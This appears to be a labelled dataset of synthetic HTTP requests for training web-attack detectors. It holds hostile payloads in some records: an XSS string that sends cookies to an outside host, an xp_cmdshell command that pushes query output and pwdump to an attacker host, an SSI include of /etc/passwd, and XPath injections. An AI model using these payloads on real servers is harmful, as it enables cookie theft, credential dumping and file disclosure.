Accept-Encoding: 
Accept-Language: *
Cache-Control: oe=cumoss
Client-ip: 249.170.15.166
Cookie: 2rtzoa=trM4z_TM;q1senu=3186639;3tH3ihrerg=5056;xweyn=ntaaunij4syrrq;htey=h4whnlle6l5os
Cookie2: $Version="36"
Date: Sun, 08 Apr 07 05:31:09 UTC
ETag: W/"Xqj1GCc-txIbUJ71yiWo"
Expect: 100-continue
From: grtsaui@oahrelty.gov
If-Modified-Since: Tue, 25 Apr 06 11:25:49 GMT
If-Unmodified-Since: Sat, 27 Oct 07 15:19:07 GMT
If-Match: "qZocMnvIvANavton-MC"
If-None-Match: "gUsImz98b5BLPFsAWk"
If-Range: Mon, 13 Jun 05 09:20:26 GMT
Max-Forwards: 386
MIME-Version: 0.3
Pragma: idnnC=t5Nn
Proxy-Authorization: Basic d25yb2lzaDp0c3RxYjUw
Authorization: Digest realm
Range: 10-87
Referer: http://www.wUTehO.net/ttitfr6/6neganF/jomr/Fjaoe.js
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/5.9 (X11; U; Open BSD i586 3.8; YN-S6; rv:6.0.6) Gecko/05925067
UA-CPU: Sparc
UA-Disp: 200,0703,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 302x1499
Via: 5.8 177.157.211.134
Transfer-Encoding: identity
Upgrade: rdeg/3.6, 4amlzd/2.4, ctceO1/0.6
Warning: 223 214.116.16.145 "vyen6nwlaqe6vllsme" "Thu, 15 Feb 07 01:20:59 CET"
X-Forwarded-For: 213.50.40.93
X-Serial-Number: 280722107
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24480
Start - Id: 47569
class: XSS
GET /rn8u.php4?54qeAirbddsiee=%27c&m8.YbVz=%3Cimg+src++%3D++%22+georatma%3E+++%22+++onmouseover+++%3D++++%22+%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.taserong.com%2Fcgi-bin%2Farde.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22%3E&edeo=hevalhuf&atLlBtePp=crN&MwbkUbncY1j5=atgteielw&yeiecrIiI=eOsxEe+%7C4dSti%7C+h%25e&er=ae&60uss40w=61r1o3&tAYwnnow=%5B+Ne&AYd4script=Sose+%27ce&errd6h9=734791 HTTP/1.1
Host: 3.81.121.248:058
Connection: eaehOanb
Accept: */*;q=0.5
Accept-Charset: x-mac-japanese, koi8-r, x-mac-cyrillic;q=0.4, x-mac-arabic;q=0.4
Accept-Encoding: *
Accept-Language: Ti-tdntwt;q=0.9, hCt-hWa;q=0.0
Cache-Control: min-fresh=0
Client-ip: 118.106.166.150
Cookie: amaoo=9nateiformnuap;se=77832;VdamdtTcosya=re64lizEouuQesEiat;nyeq3bpogi0yr7=57797554
Cookie2: $Version="36"
Date: Tue, 31 Jan 06 17:18:01 CET
ETag: "jT6yUuV.swlQFpy"
Expect: 100-continue
From: ilyylhh@tttqt1htr.biz
If-Modified-Since: Fri, 08 Jan 10 20:50:19 GMT
If-Unmodified-Since: Tue, 06 Mar 07 22:45:27 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 210
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic c0k4dG55OjJFbGFo
Authorization: et1vtr gmhadkba=incdte
Range: 946-214738,54330-8
Referer: http://www.ls7lli.be/u9Rz7.sh
TE: chunked,gzip
Trailer: Accept-Language
User-Agent: aodrae8blT (eYXrvNJ; l4W.82)
UA-CPU: x86
UA-Disp: 2757,1725,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 684x889
Via: mnozd/9.6 www.t1tz.gif, e0ey/4.6 www.aY6wvi.htm, FTP/9.9 www.mroWrSo9.js
Transfer-Encoding: compress
Upgrade: eTere/4.3, ulLei/2.8
Warning: 084 236.106.31.192:22 "edNteueotaOrbpOeua" "Thu, 03 Jun 04 03:45:24 GMT"
X-Forwarded-For: 113.69.67.238
X-Serial-Number: 2524902769036083814
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 47569
Start - Id: 18388
class: Valid
GET /arser8e/IArSbodybcDUyVin@rc.jsp?KAW13zP=htut&eo0uauwhvuBeSwq=iagiMe&deetus=50&uh=0beofeHtmr0&-@R5RBIA=wgOqaS&Sscd=lwherey&-y32q.-8b=hoatyetrAlhO HTTP/1.1
Host: 169.183.254.119
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: ciriHj9r-eltd9;q=0.5, Rkec-4;q=0.6
Cache-Control: min-fresh=778
Client-ip: 50.134.94.108
Cookie: 8ttetk=nhomec|eDfM;etbex0hrqnenh=scripti+ttD-mi=c[sie(l;da;eeeone=9;it=sKSg
Cookie2: $Version="8"
Date: Tue, 09 Mar 04 01:20:34 UTC
ETag: "UGsD1LjbDZjqqjJBf"
Expect: 100-continue
From: riig0g@lptIii.ch
If-Modified-Since: Sun, 30 Jan 05 03:50:31 CET
If-Unmodified-Since: Tue, 21 Sep 04 17:47:56 GMT
If-Match: "12fYjJKWlrdQW1rCSeE"
If-None-Match: *
If-Range: *
Max-Forwards: 58
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Basic YXNob2lvZTplSG1h
Authorization: ahes urkauset=elhls4e
Range: -1,77209-
Referer: http://ulltth.com/tni5/osoodj/rdju/1aac5.mpg
TE: chunked;q=0.6
Trailer: Warning
User-Agent: wMsvlviom/5.5.9
UA-CPU: x86
UA-Disp: 0207,859,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 705x273
Via: vprxt/9.0 223.8.220.144, 6.3 www.cAaao4te.htm, 1.6 54.21.134.26
Transfer-Encoding: compress
Upgrade: pto1de/0.8, qne/9.3, atwl/8.8
Warning: 233 131.132.144.191 "OnEdmsatmalecc2jI" "Sat, 10 Jun 06 22:22:26 UTC"
X-Forwarded-For: 185.28.190.254
X-Serial-Number: 9325860267416944126
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18388
Start - Id: 514
class: Valid
GET /AmyUXYpassthrubVE1nlib/97@HS1WmCLExtt7qWu8/xmys/4BzCaC/s4AIhsdOaeia2dbpsan/uuDh1T9B/38q-Es-ZySJe/Hb4tyL-Cjselectdelete/2cdrmrsodneeqea/tpnronorrn9iIl.pl? HTTP/1.1
Host: www.NTxyhnf.com:30443
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: ssT-s8dlr, sntnty-Noe3t
Cache-Control: no-store
Client-ip: 133.168.110.42
Cookie: nve=fgpjkebb5;lqanngOesftoon=fyc;aopnat=48358172;e1ln=spnzhttk;oodpnrordsr1tho=t
Cookie2: $Version="487"
Date: Wed, 20 Sep 06 03:59:35 GMT
ETag: W/"qmPRCaGmEOHB-JKz273d"
Expect: aorh
From: Csuh@ese7nna.be
If-Modified-Since: Wed, 23 Apr 08 24:21:33 GMT
If-Unmodified-Since: Sun, 25 Apr 04 12:36:59 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5429
MIME-Version: 0.3
Pragma: ekis='Oosndmi'
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic Y2V3c2liY2M6dGFwbm4=
Range: 8-08055,3-
Referer: http://www.ousi2.net/vijsne5t/bdt7ci/eoiu/eoeeEzEe.php
TE: trailers
Trailer: Referer
User-Agent: w@.Zye http://www.moylmDi.gov
UA-CPU: StrongARM
UA-Disp: 156,7636,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 425x931
Via: 1.0 www.naewt.shtml:09, 2.0 www.tiemy.jpg:9982
Transfer-Encoding: compress
Upgrade: hm4tsE/7.7, sngi/4.9, b9nhx/5.1
Warning: 386 233.83.75.168 "ufears" 
X-Forwarded-For: 2.115.5.51
X-Serial-Number: 35520
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 514
Start - Id: 49274
class: XPathInjection
GET /hsew3ai2stt7/apbzl/wwget8servicesvforml8/8QEIUor6guCY0d/j_lgrfUJ_63fo/kCcB5ri36kXo.cfm?a2ser8ctiiltote=wcn%28G%2BEia&raenTtskw=3829814&re9lsheel=82&tdDaaaw=gDms%27+or++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or++%27ziJdties%27++%3D+%27&ittet5s7be=tbgtQOk7JFp&jjndbaleyueIet=u%24ao+2up&evt=e1locationr&AN8C=o-uetoy%22%225EntmdTL3uw&gsaxu=7131 HTTP/1.1
Host: 20.104.98.112
Connection: hnes
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: iob-kolin1
Cache-Control: only-if-cached
Client-ip: 88.174.167.80
Cookie: nzr=:ibetweene+
Cookie2: $Version="037"
Date: Sun, 15 Jan 06 03:57:01 UTC
ETag: W/"JPmR9_9ZPrUkFgwSt4"
Expect: nimaee=lNou1m
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Sun, 08 Nov 09 24:33:35 UTC
If-Unmodified-Since: Mon, 02 Oct 06 19:04:40 UTC
If-Match: *
If-None-Match: "Mf-kzJuWaJ1-kct"
If-Range: "zffv5BtAyOTFQc2yf6"
Max-Forwards: 10
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: Basic bmRhb25TYkw6Y2U0cg==
Range: 7-714795,2600-
Referer: http://www.eiqcujx.gov/oaTp/ehsew.jpg
TE: trailers
Trailer: Trailer
User-Agent: a6G0SeMt http://www.tsoexez.cz
UA-CPU: StrongARM
UA-Disp: 3091,890,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 666x0440
Via: 8.0 www.ocnsst.tiff, 5.0 www.2d8h.css, 9.2 www.ld7I.png
Transfer-Encoding: identity
Upgrade: iedn/7.3, nh9e/5.6, 2l7Pr/8.1
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49274
Start - Id: 36408
class: OsCommanding
GET /hseiha8urfw4tW09/echo0v7UJEDy2C/R.n/hBTJAY.JQe-Q..gif?mwlmge2=exec+++++xp_cmdshell+%27bcp+++++%22select+*+++++from++++ah%22++++queryout++pwdump.exe+++++-c+-Craw+-Shackersip++++-Usa+-Ph8ck3r%27 HTTP/1.1
Host: 87.111.72.198
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: nYj-ra;q=0.8, eejwsehe-pe, a6piGn7-hEoni
Cache-Control: max-stale=2207
Client-ip: 90.203.150.133
Cookie: aytxsru=sNx;s8T=Kmr;o2sEeat0j=lPo;wJ= bxk;mL7oljdlU=metad5H ;UliSeL=seXote
Date: Mon, 22 Sep 08 04:08:08 GMT
ETag: "hOr.gXCisBKC7v6cJQ"
Expect: ehdmt
If-Modified-Since: Wed, 15 Nov 06 18:12:26 GMT
If-Unmodified-Since: Wed, 23 Nov 05 13:00:50 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 13 May 07 24:50:40 GMT
Max-Forwards: 698
Proxy-Authorization: NTLM bmlvMHVsbHB0bGNvbGF0aW5XYmphZW5MYXNvdGlvRXJBaGd3NGVmZ20=
Referer: /ghShn4/tfaeahn/is2g/nfpeaour.gif
TE: deflate,gzip;q=0.0,deflate;q=0.8
User-Agent: Mozilla/2.3 (Windows; U; Windows NT 4.5; He-oh; rv:0.5.4) Gecko/33022279
UA-CPU: PowerPC
Via: LYb4ae/0.7 73.2.170.101, HTTP/4.2 49.95.165.25
Transfer-Encoding: gzip
Warning: 271 125.50.84.12 "ieans4Sb3nfr1aNeeTba" "Fri, 16 Dec 05 02:23:13 UTC"
X-Serial-Number: 3132284615
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36408
Start - Id: 13025
class: Valid
GET /npKu9HoIgImD/torcd0eeozaoLsn/hetEo3sae5ltt2tsE/cxE4Uepmb9bRwgr/dbdeeotkalima/iiuemen5ts/aCLGlH/el/hryhiudEauwn1Tel.html?eHmlikefR=ot-ihaetylap&llh=%2B&lhyNH=41561936&Bphyxema2stdjz=geuaedx9lbC26fd&seSEn3=2&watsS=nm4gtt9Q7r&ijaceit=nl9h_tju&IodQOdO=999057&q8he2m9uoLtnd=700892642&th8sC8irdibom=sperle4gati%2F7u8perln HTTP/1.1
Host: 110.205.115.79:80
Connection: hoft
Accept: */*;q=0.9
Accept-Charset: x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: *
Cache-Control: msl=joouieta
Client-ip: 82.22.221.79
Cookie: wfaoittEcsnzO=v~u/v;7cOvOOeg=etbt8
Cookie2: $Version="4"
Date: Mon, 22 Jun 09 16:37:15 GMT
ETag: "e24vEhrUhq6Ee1j"
Expect: t2oeja=tmrneee;sSs7ee=EtRhuouy
From: 5dwe1@ebi1lgoaan.gov
If-Modified-Since: Fri, 06 Oct 06 21:41:29 GMT
If-Unmodified-Since: Thu, 09 Aug 07 22:41:41 CET
If-Match: "jfjXhvAPryfJb1r3-d"
If-None-Match: *
If-Range: "EAdKQIEwUinC1bj3oN-"
Max-Forwards: 01
MIME-Version: 6.1
Pragma: rRie1='eld'
Proxy-Authorization: Digest qop=yHRl2
Authorization: hEmo3 gtAictP=eytcrh
Range: 809093-4768
Referer: /ama7yde/hsel3.exe
TE: deflate,deflate;q=0.0
Trailer: Proxy-Authorization
User-Agent: dhrdeubmiC (sp7-I_R0dg; nCNh9D)
UA-CPU: StrongARM
UA-Disp: 5331,978,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 011x9947
Via: 0.2 20.190.78.52, 4.3 www.izca.js:17
Transfer-Encoding: uoEss; csunI=taRyo
Upgrade: ig6/1.7, nfeec/0.7, qsayo/2.5, usTac/5.5, leu/9.8
Warning: 458 www.Ib4ru.tiff:9066 "sSe4nhsT" 
X-Forwarded-For: 229.9.95.131
X-Serial-Number: 72290
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13025
Start - Id: 30507
class: Valid
GET /apXzRM@v2PzfD/KUbkhZn/GU/9jZkdH6GLYF_/tOoeioetla/kqUBQSpDXuB/cnrRd3Ars/gB@H.A/NvfspI.exe?iWo=8&catPvn7@INservicesaobject=9426762785&nnldyr0t=7286&esku=1&0yicmdkXT42=ldbl%3Ag&9Os4=wg%40EY&keeeaiyWnwbinab=093148&urhEeafuutsi=tN-zy2E03 HTTP/1.1
Host: 29.47.61.2
Connection: timdnnot
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: identity;q=0.2, deflate;q=0.3
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 82.124.54.145
Cookie: aji=nehoratB;eayShoxetjpn3=enp6aeahu;asHrobesuwsr=om
Cookie2: $Version="6"
Date: Thu, 17 Apr 08 04:22:28 UTC
ETag: "KPHCJthG0o6bKtBQMm_"
Expect: 100-continue
From: qdtdedst@Snreomeo.de
If-Modified-Since: Wed, 30 Apr 08 03:24:00 UTC
If-Unmodified-Since: Tue, 19 May 09 06:41:59 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Aug 05 12:09:11 UTC
Max-Forwards: 4
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest uri=http://Eeh8bo.ch/eaiph.sh
Range: 4-2253
Referer: http://www.attjEp.uk/oUcl/etnFyide/inldigl/g7nivina.dll
TE: chunked,gzip
Trailer: Transfer-Encoding
User-Agent: ctnbbiee/6.0.3.6.1
UA-CPU: 68000
UA-Disp: 6844,128,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 710x3564
Via: HTTP/0.2 188.14.120.186:98130, 1.4 www.tuiuoTa.htm
Transfer-Encoding: compress
Upgrade: 5rir/1.2, ag6/9.0, lli/9.6, ihcn/5.0
Warning: 638 71.219.15.61 "hmtn" "Sat, 22 Jan 05 06:21:26 UTC"
X-Forwarded-For: 50.177.217.100
X-Serial-Number: 9887656877315806
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 30507
Start - Id: 48831
class: XPathInjection
GET /@lA/eqaIkL.GYq38oqM4l-/birtTrmzogi6ohoie/N3Y__0W/tU4TxPH71Om.exe?c78jiidtgyrAt=c2e%27++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or+%27ttottl%27+++%3D%27 HTTP/1.1
Host: 78.81.18.95:80
Connection: close
Accept: video/*
Accept-Charset: x-mac-roman;q=0.6, iso-8859-8;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: 1eorc-Yshne;q=0.6, ajtsizp-3on;q=0.5
Cache-Control: no-store
Client-ip: 35.113.99.20
Cookie: rLR7hsAlt=m6anr(
Cookie2: $Version="84"
Date: Sat, 12 Apr 08 01:37:01 GMT
ETag: W/"Eot2OfllQboCmLby61Ro"
Expect: ats3ir=A2el6e
From: 18kll@eaes.it
If-Modified-Since: Sat, 10 Jul 04 03:34:30 GMT
If-Unmodified-Since: Sun, 19 Aug 07 23:23:59 UTC
If-Match: *
If-None-Match: *
If-Range: "a94BlaFi9D5pQ4_"
Max-Forwards: 819
MIME-Version: 5.3
Pragma: pwaqisti='wvnete'
Proxy-Authorization: NTLM bmVpVHByZTAwRm5lZWNvZWIwc2hyU2pzQW5wZmV0cmVzZW9yZWFlZ2FPZXIw
Authorization: NTLM ZWRUNXNpbzJ0amVzc2RrT3llcmU5bFNvaXRuZVNhZU5lb3RiTWFpZ2ZidGJ0ZQ==
Range: -970304,-74
Referer: http://www.ddtaT.com/ei55ihpm/3sweo/8sxe/noaoe.cgi
TE: chunked;q=0.8
Trailer: Referer
User-Agent: Mozilla/7.2 (X11; U; Solaris 3.6; sa-sy; rv:1.4.1) Gecko/23661731
UA-CPU: StrongARM
UA-Disp: 6889,429,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0867x2824
Via: 0.2 www.rtNemg.jpeg
Transfer-Encoding: gzip
Upgrade: qdiue/5.0
Warning: 056 www.f4xe1oNm.htm "ehiaia" "Mon, 17 Nov 08 12:21:14 CET"
X-Forwarded-For: 54.250.164.51
X-Serial-Number: 6969445752998
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48831
Start - Id: 6136
class: Valid
POST /okqspNzD5IKxfk0obBXY/8qxKE5LfNg/h5tofUcxmy5oGIg/B_@Kih/YUsphts/r7dMbZ8pB/wbTr8aU/aftza9tirahl/ephnht/hemraned.swf? HTTP/1.1
Content-Length: 263
Content-Language: wthTN,ole,y36rfTq
Content-Encoding: compress
Content-Location: http://www.buboesws.uk/o39Sm/p4eR7P/Ezrwne/jorysl.jsp
Content-MD5: am5zc2RMZnVzRXRuZGRqOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Nov 08 07:31:34 CET
Last-Modified: Wed, 24 Oct 07 03:36:13 GMT
Host: 106.140.211.180:1780
Connection: tumkna
Accept: */*;q=0.3
Accept-Charset: x-mac-turkish;q=0.7, iso-8859-2, euc-cn, x-mac-icelandic, iso-8859-8;q=0.3
Accept-Encoding: identity, deflate, deflate
Accept-Language: aiaEwcM-p;q=0.8, e4nypr-9ca;q=0.4
Cache-Control: no-cache
Client-ip: 106.188.51.238
Cookie: sb4iejbwe=7307;ntonEuntbe3=nvj0lKp4R7f
Cookie2: $Version="15"
Date: Tue, 02 May 06 02:27:17 GMT
ETag: "jyQFaH4RlKaw88i"
Expect: meaF=Ewr0e;un9o=eexf1
From: Etnnkns@tnee.fr
If-Modified-Since: Fri, 11 Jul 08 24:53:22 CET
If-Unmodified-Since: Fri, 29 Jun 07 10:46:51 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 28 Feb 09 22:47:08 CET
Max-Forwards: 8936
MIME-Version: 4.3
Pragma: tosxeNhh='t'
Proxy-Authorization: Digest algorithm=cedo
Authorization: Basic OXc5ZWc6aUlybmVlbQ==
Range: 611533-,1458-075
Referer: http://teeNTahg.it/arimco/ybmeieyr/AtgS.tar.gz
TE: trailers,deflate,chunked;q=0.3
Trailer: Via
User-Agent: zFilmqB http://www.hrAt8n.cz
UA-CPU: StrongARM
UA-Disp: 8680,157,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7265x3057
Via: ssrBki/8.3 www.ehwotOrf.css:0, n7u/4.8 75.173.204.193, FTP/9.9 www.Eleoifut.css:7
Transfer-Encoding: gzip
Upgrade: pnds/8.6
Warning: 335 www.isiR.js "eyuxr" 
X-Forwarded-For: 150.210.233.126
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hcaOAcennsceil=scriptg\&8ge=56&hdxcsRT=ll7vAeIyD4vN&ae9smss=5&2vn=8B27&EhAaEunriu7a=daesmseubniboathid&wEhsLie2a=uzi%-onOvvbscript&E4HsaSunHor=ipstd/m7&fsxaiAwos=ulibefars19Ewffr&rdEtis8es=;eeu:includec &7ys6ayloeoas=91&dswi4s=dotmpjh-opene@n0rxml agm

End - Id: 6136
Start - Id: 26394
class: Valid
GET /aLW5BYtgTiBzJ_GaR/m3etclocationCmoptKdocumentV/eA1ew4Q/1RO/m1dxbskwN/05/X-XOC0WvKRp/ogLv8rR.pF4/gQ9_htaccesXNeq/-QHsV_sRVLTilink/eq-1GucL.php?futo8ksy9bms72d=2829409&nwRu9rcH=d4ou-ByI&ee08irumr9z=573480&rLKwhttpsaUWNf9passthru=dhetcnctienBrti&eeaeeb8Na=t%3C&RWSaccept7=unlitauhshc6&ndahan8lotcg=iihnLt9mitxiomtf&tiin4C4emoYndc=nbodyiae+fa%7Ciolt&walxe=kohsu3dxeohealed6l&yLl8orAAxmlgk8=8215336793&Wgd.64i67b=92382&tvThteh81oEroo=anduna4atheee&rirRqpVtI=7 HTTP/1.1
Host: www.eoiitc.cz
Connection: close
Accept: text/*;q=0.4, audio/*;q=0.9
Accept-Charset: x-mac-ce, us-ascii;q=0.6, windows-1253;q=0.3, iso-8859-1;q=0.4, x-mac-japanese
Accept-Encoding: gzip, compress;q=0.8, deflate
Accept-Language: ri-nit, 1u8-heees3e;q=0.0, odi0-wNd, erauomhR-ed5;q=0.3, h0ceyrr-dgunns6
Cache-Control: oasT53r='n'
Client-ip: 250.76.61.234
Cookie: NAr=03;srneaifcohertv=no|;ncme=e;6nhe=4;XSVZaYRDb=inoEDaG
Cookie2: $Version="9"
Date: Sun, 14 Dec 08 02:23:13 UTC
ETag: W/"lxOd-IIVqXV7vkQNfO"
Expect: gsroej
From: aR5eoW@aIpYiyate.org
If-Modified-Since: Sat, 07 Nov 09 23:46:30 UTC
If-Unmodified-Since: Fri, 30 Jan 09 15:48:13 CET
If-Match: *
If-None-Match: "cULn9qhrjFiziPbAPm"
If-Range: Fri, 10 Dec 04 11:38:19 CET
Max-Forwards: 43
MIME-Version: 1.1
Pragma: eQdn='h'
Proxy-Authorization: Digest nonce
Authorization: s56l t6v4IM0e=aspno
Range: -954249,93-21781,60217-
Referer: /lsetro/toEas.cfm
TE: trailers,deflate;q=0.6
Trailer: Pragma
User-Agent: Mozilla/2.6 (compatible; Konqueror/4.6; Open BSD i586; apduo)
UA-CPU: StrongARM
UA-Disp: 146,5965,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5346x326
Via: 2.1 172.87.237.229, 4.5 54.187.126.91, 0.0 www.hhrgeh.html
Transfer-Encoding: compress
Upgrade: Yoanr/1.5, vNn/4.7, 7loa/0.1, nab9I/9.9, ale/2.7
Warning: 601 www.tutmoai.png:0 "Mibaotwwhlhhl" 
X-Forwarded-For: 21.229.165.135
X-Serial-Number: 7631325909856
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26394
Start - Id: 39814
class: SSI
GET /uK@IPYVj9Kz/nhr.tiff?ltubapctspaayp=mavyI&aqeohoNn=3&etclKvbscriptlconnect=095&ElRjbl5lnni=%3C%21--%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22++++--%3E&h1_brcpjumehz.=bn&ie4aieohmLntn=tdb&j7rxnetomau=58135160&k7ochzf=e3i8oedee80d&rin5rr=47l-uXR8Y&atideadnNioc=881&iisYe1tnt26edeo=9a HTTP/1.0
Host: www.ikgll.gov
Connection: close
Accept: image/*;q=0.2, text/xml, image/jpeg;q=0.4
Accept-Charset: windows-1251;q=0.9, windows-874, euc-jp;q=0.6, windows-874
Accept-Encoding: identity;q=0.2, compress, gzip, gzip;q=0.8, deflate;q=0.7
Accept-Language: *;q=0.3
Cache-Control: min-fresh=2257
Client-ip: 144.107.45.207
Cookie: BvCead=6428191;e8rBhs=inn p;emhn=a7iire
Cookie2: $Version="9"
Date: Thu, 11 Sep 08 17:48:33 CET
ETag: W/"N3OJ9wRTHNv3uA18"
Expect: eE2cus9
From: fEkbo16t@uycIttryA.biz
If-Modified-Since: Fri, 11 Feb 05 14:15:11 CET
If-Unmodified-Since: Sat, 01 Nov 08 02:31:46 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 29 Apr 07 13:55:12 UTC
Max-Forwards: 32
MIME-Version: 2.7
Pragma: Psish=e2susee
Proxy-Authorization: Digest username="eege"
Authorization: Digest username="oeue"
Range: 9717-347450,4-
Referer: /tiArrt/9as3neel.png
TE: chunked;q=0.7,trailers,trailers
Trailer: Connection
User-Agent: i0sopseee8r
UA-CPU: Sparc
UA-Disp: 052,114,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9632x079
Via: 4.2 www.4srt.shtml, HTTP/3.4 www.hsheo.html, 1.1 www.hNahzoh.jpg
Transfer-Encoding: gzip
Upgrade: oLt/5.9, tEgb/6.9, 6laet/2.7, faare2/0.4, vst20/6.5
Warning: 728 www.6meT.htm "tbadlt3aeEaT" 
X-Forwarded-For: 142.194.73.31
X-Serial-Number: 0280999804959
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39814
Start - Id: 9278
class: Valid
GET /ocJKiLpC2qBn9Sqv7c/nu1neh/QQ4/9gwXDfFUK/03/rvXdARfIE3lK0Q4u/nsM5VOI6wrW/de/httpCNinsertC5AoaOUBvc/uC/Rnh3n./ha9nool4l7oocarinhhr.css?access_logO14in2EzcN=%5Bswinnt HTTP/1.0
Host: www.dtixmn.st:5
Connection: epaedna
Accept: text/*;q=0.8, audio/x-wav;q=0.0, application/*
Accept-Charset: *;q=0.5
Accept-Encoding: identity, deflate;q=0.8, identity, deflate, identity;q=0.1
Accept-Language: mubur-sh99, tiefta-Estr
Cache-Control: only-if-cached
Client-ip: 150.138.156.118
Cookie: enSgs=RuosiiframehbnFn)a0d: rps;r6c1=9301640;eytops2rtro=nc0eadmindisn9f;dses=sEenHtfpRhfhtkafbo;7H8PT=reiI)tehH%e
Cookie2: $Version="84"
Date: Tue, 07 Jun 05 20:20:41 UTC
ETag: "uSCt80FNuPQ0vz."
Expect: vt4hih9=nniom4e
From: pshnnba@ycsiL.net
If-Modified-Since: Fri, 01 Apr 05 14:29:12 CET
If-Unmodified-Since: Sun, 11 Nov 07 02:02:38 GMT
If-Match: *
If-None-Match: "rykYX0IhjS5ivo6s"
If-Range: Sat, 31 Mar 07 06:14:07 CET
Max-Forwards: 19
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic c2FvdDp0bU55bGt0
Authorization: hjen 4uvssb=istisekh
Range: 8984-,-145531,-992
Referer: /g2tdnns/C2cse2co/crxEs.tiff
TE: trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: n2D8kpcA http://www.hwbt.fr
UA-CPU: 68000
UA-Disp: 8991,9387,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 1723x158
Via: 1.8 www.kmrxw5ec.gif, 8.0 www.ce8sk.gif, 7.6 www.12prlk.png
Transfer-Encoding: identity
Upgrade: eou/4.3, mls/5.5, 5am/5.5
Warning: 290 110.110.36.21 "oon7Ni" 
X-Forwarded-For: 215.205.82.248
X-Serial-Number: 378312956268
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9278
Start - Id: 19222
class: Valid
GET /c7KcO7iA/tkazYrr1bhtTx/bgsoundj4scriptu.hU0.dll?oar2dgnei=a%5C+Cslbgsoundadcpe&epawa8ha5tetS=2964&a3=ro&VqinsertGL=da&we8sngtsru=4526&yatiorOvooel=iFQajt4%40z&unQ=19720972&aeeg=at%40wp+edocumenta%40uoneosihNd HTTP/1.1
Host: www.EbupC.st
Connection: close
Accept: */*;q=0.5
Accept-Charset: euc-jp;q=0.7, us-ascii;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=1659
Client-ip: 110.113.74.90
Cookie: jaAiaeauenn=hachVa;OsjyiehdowgT=5y;rbc=iHLXTH1H;efrtnnevmsagEi=1105423;iniwammRf=ossm;psottcnfal=p7eo
Cookie2: $Version="324"
Date: Fri, 11 Jul 08 21:22:59 GMT
ETag: W/"mW@gXcO0qwbn-4Ba"
Expect: 100-continue
From: siiaioee@bal3q.biz
If-Modified-Since: Thu, 01 Jul 04 07:56:42 GMT
If-Unmodified-Since: Wed, 18 May 05 20:08:02 GMT
If-Match: *
If-None-Match: "u1KhbBCF31h6MVD1tkA"
If-Range: Tue, 04 Apr 06 21:09:30 UTC
Max-Forwards: 4261
MIME-Version: 4.0
